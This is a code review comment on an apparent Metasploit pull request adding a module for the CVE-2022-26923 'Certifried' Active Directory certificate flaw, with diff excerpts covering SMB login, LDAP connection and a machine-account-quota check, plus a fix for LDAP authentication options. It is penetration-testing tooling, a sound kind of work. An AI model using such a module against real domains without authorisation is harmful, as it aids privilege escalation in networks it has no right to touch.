modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb

```diff
@@ -0,0 +1,275 @@
+      simple.login(
+        datastore['SMBName'],
+        username,
+        password,
+        domain,
+        datastore['SMB::VerifySignature'],
+        datastore['NTLM::UseNTLMv2'],
+        datastore['NTLM::UseNTLM2_session'],
+        datastore['NTLM::SendLM'],
+        datastore['NTLM::UseLMKey'],
+        datastore['NTLM::SendNTLM'],
+        datastore['SMB::Native_OS'],
+        datastore['SMB::Native_LM'],
+        { use_spn: datastore['NTLM::SendSPN'], name: rhost }
+      )
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e})")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e})")
+    end
+  end
+
+  def disconnect_smb(tree)
+    vprint_status('Disconnecting SMB')
+    tree.disconnect! if tree
+    simple.client.disconnect!
+  rescue RubySMB::Error::RubySMBError => e
+    print_warning("Unable to disconnect SMB ([#{e.class}] #{e})")
+  end
+
+  def can_add_computer?
+    vprint_status('Requesting the ms-DS-MachineAccountQuota value to see if we can add any computer accounts...')
+
+    quota = nil
+    begin
+      ldap_open do |ldap|
+        ldap_options = {
+          filter: Net::LDAP::Filter.eq('objectclass', 'domainDNS'),
+          attributes: 'ms-DS-MachineAccountQuota',
+          return_result: false
+        }
+        ldap.search(ldap_options) do |entry|
+          quota = entry['ms-ds-machineaccountquota']&.first&.to_i
+        end
+      end
+    rescue Net::LDAP::Error => e
+      print_error("LDAP error: #{e.class}: #{e.message}")
+    end
+
+    if quota.blank?
+      print_warning('Received no result when trying to obtain ms-DS-MachineAccountQuota. Adding a computer account may not work.')
+      return true
+    end
+
+    vprint_status("ms-DS-MachineAccountQuota = #{quota}")
+    quota > 0
+  end
+
+  def print_ldap_error(ldap)
+    opres = ldap.get_operation_result
+    msg = "LDAP error #{opres.code}: #{opres.message}"
+    unless opres.error_message.to_s.empty?
+      msg += " - #{opres.error_message}"
+    end
+    print_error("#{peer} #{msg}")
+  end
+
+  def ldap_open
+    ldap_peer = "#{rhost}:#{datastore['LDAP_PORT']}"
+    base = datastore['SMBDomain'].split('.').map { |dc| "dc=#{dc}" }.join(',')
+    ldap_options = {
+      port: datastore['LDAP_PORT'],
+      base: base,
+      auth: {
+        username: "#{datastore['SMBUser']}@#{datastore['SMBDomain']}",
+        password: datastore['SMBPass'],
+        method: :simple
```

Comment:
I tested on the `feature-kerberos-authentication` and some changes are required to make it work with the new authentication logic for LDAP. Apparently, `ldap_connect` does not accept passing `username` and `password` as a hash anymore. Instead, specific `USERNAME`, `PASSWORD` and `DOMAIN` datastore options needs to be set. Also, I found out the domain should be included in `USERNAME` (using the `@` syntax) for plaintext authentication, whereas for NTLM, `DOMAIN` option should be set instead. Finally, the `method: :simple` LDAP option needs to be removed, since it is set by the library according to the `LDAPAuth` options.

I could make it work with these changes:
```diff
diff --git a/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb b/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb
index fa0b3957be..7898580e2c 100644
--- a/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb
@@ -217,14 +217,16 @@ class MetasploitModule < Msf::Auxiliary
     base = datastore['SMBDomain'].split('.').map { |dc| "dc=#{dc}" }.join(',')
     ldap_options = {
       port: datastore['LDAP_PORT'],
-      base: base,
-      auth: {
-        username: "#{datastore['SMBUser']}@#{datastore['SMBDomain']}",
-        password: datastore['SMBPass'],
-        method: :simple
-      }
+      base: base
     }

+     datastore['USERNAME'] = datastore['SMBUser'].dup
+     datastore['PASSWORD'] = datastore['SMBPass'].dup
+     datastore['DOMAIN'] = datastore['SMBDomain'].dup
+     if ['plaintext', 'auto'].include?(datastore['LDAPAuth'])
+       datastore['USERNAME'] << "@#{datastore['SMBDomain']}"
+     end
+
     ldap_connect(ldap_options) do |ldap|
       if ldap.get_operation_result.code != 0
         print_ldap_error(ldap)
```
We might want to update the new LDAP library to accept an option hash, like it was before.